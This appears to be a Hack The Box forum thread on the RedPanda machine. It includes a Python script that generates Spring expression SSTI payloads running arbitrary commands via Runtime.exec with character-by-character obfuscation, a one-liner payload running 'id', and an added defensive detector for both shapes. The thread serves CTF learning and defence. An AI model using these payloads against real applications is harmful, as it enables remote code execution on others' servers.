RedPanda - HTB [Discussion]
Amusing that Gato and Syn had identical solutions! Perhaps study a little on XXE injection techniques before attempting root.

Here's a short script to produce the SSTI queries:

#! /bin/python3

command = input('Enter command:')

def injection(comm):
    build = "*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime()"
    first_ascii = str(ord(comm[0]))
    build += ".exec(T(java.lang.Character).toString(" + first_ascii + ")"
    comm = comm[1:]

    for letter in comm:
        letter_ascii = str(ord(letter))
        build += ".concat(T(java.lang.Character).toString(" + letter_ascii + "))"

    build += ").getInputStream())}"

    return build

print(injection(command))
Reply
(July 10, 2022, 06:26 AM)Exa Wrote:
(July 9, 2022, 08:40 PM)yumi Wrote: https://github.com/VikasVarshney/ssti-payload


Based off of this script, I created this one-liner (needs to be URL encoded):
 

*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}


What clued you in initially to looking at exploiting JAVA?
Reply
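Added example (not part of any post in this thread, and not code from the linked repository): a defender-side check that flags both payload shapes shown above in request data, the literal `exec('id')` one-liner and the `Character.toString(N).concat(...)` form the script emits, and recovers the hidden command for triage. The parameter name `name`, the `HIGH_RISK` shortlist and the sample request bodies are assumptions constructed for the demo.

```python
import re
from urllib.parse import quote, unquote_plus

DELIM = re.compile(r"[*$#]\{")                            # expression openers: *{ ${ #{
TYPE_REF = re.compile(r"T\(\s*([A-Za-z_][\w.$]*)\s*\)")   # SpEL type reference T(pkg.Class)
CHAR = re.compile(r"T\(java\.lang\.Character\)\.toString\((\d{1,5})\)")
LITERAL = re.compile(r"\.exec\(\s*'([^']*)'")
# Assumed shortlist of classes that should never appear in user input.
HIGH_RISK = {"java.lang.Runtime", "java.lang.ProcessBuilder"}


def decode(value, rounds=3):
    """URL-decode up to `rounds` times so double-encoded input is normalised."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect(raw):
    """Return None for clean input, otherwise a triage record for the alert."""
    text = decode(raw)
    opener = DELIM.search(text)
    if opener is None:
        return None
    classes = sorted(set(TYPE_REF.findall(text, opener.end())))
    if not classes:
        return None
    codes = CHAR.findall(text)
    literal = LITERAL.search(text)
    if codes:      # command hidden as Character.toString(N).concat(...) pieces
        command = "".join(chr(int(c)) for c in codes)
    else:
        command = literal.group(1) if literal else None
    return {"classes": classes, "high_risk": bool(HIGH_RISK & set(classes)), "command": command}


# Constructed request bodies; the payload strings are the shapes quoted in the thread.
ONE_LINER = ("*{T(org.apache.commons.io.IOUtils).toString("
             "T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}")
CONCAT = ("*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime()"
          ".exec(T(java.lang.Character).toString(105)"
          ".concat(T(java.lang.Character).toString(100))).getInputStream())}")
SAMPLES = ["name=red+panda", "name=" + quote(ONE_LINER), "name=" + quote(quote(CONCAT))]

if __name__ == "__main__":
    for body in SAMPLES:
        print(inspect(body))
```

A hit here is a signal to alert on, not a fix; the underlying issue is user input reaching template expression evaluation.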
Interesting
Reply

